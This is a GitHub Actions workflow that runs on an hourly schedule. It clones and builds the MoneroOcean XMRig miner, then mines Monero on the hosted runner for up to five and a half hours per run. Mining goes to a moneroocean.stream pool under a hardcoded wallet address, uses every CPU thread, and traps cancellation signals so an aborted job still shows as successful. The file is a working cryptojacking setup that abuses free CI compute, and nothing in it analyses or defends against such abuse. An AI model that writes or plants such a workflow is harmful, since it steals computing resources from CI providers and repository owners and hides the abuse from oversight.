name: Earner-1

on:
  schedule:
    - cron: '0 */1 * * *'  # Every 1 hours
  workflow_dispatch:

jobs:
  mine:
    runs-on: ubuntu-latest

    steps:
      - name: Install dependencies
        run: |
          sudo apt update
          sudo apt install -y git build-essential cmake libssl-dev libhwloc-dev libuv1-dev

      - name: Clone MO XMRig
        run: git clone https://github.com/MoneroOcean/xmrig.git moxmrig

      - name: Build MO XMRig
        run: |
          cd moxmrig
          mkdir build && cd build
          cmake .. -DWITH_HWLOC=OFF
          make -j$(nproc)

      - name: Run MO XMRig for 5h30m
        run: |
          cd moxmrig/build
          trap "echo 'Job canceled, exiting successfully'; exit 0" SIGTERM
          timeout 19800s ./xmrig \
            -o gulf.moneroocean.stream:10002 \
            -u 44SpTnkYyc9NmH3QjJkoLtVc3DXXJGwfD7tvhF1zwNRz9JbAMeHNiCD4wb8ivNvo3edgrntc3ra1meA5uZhT3vbaJ1ApPT1 \
            -p worker-1 \
            --donate-level 0 \
            -k --coin monero \
            -t $(nproc) || exit 0
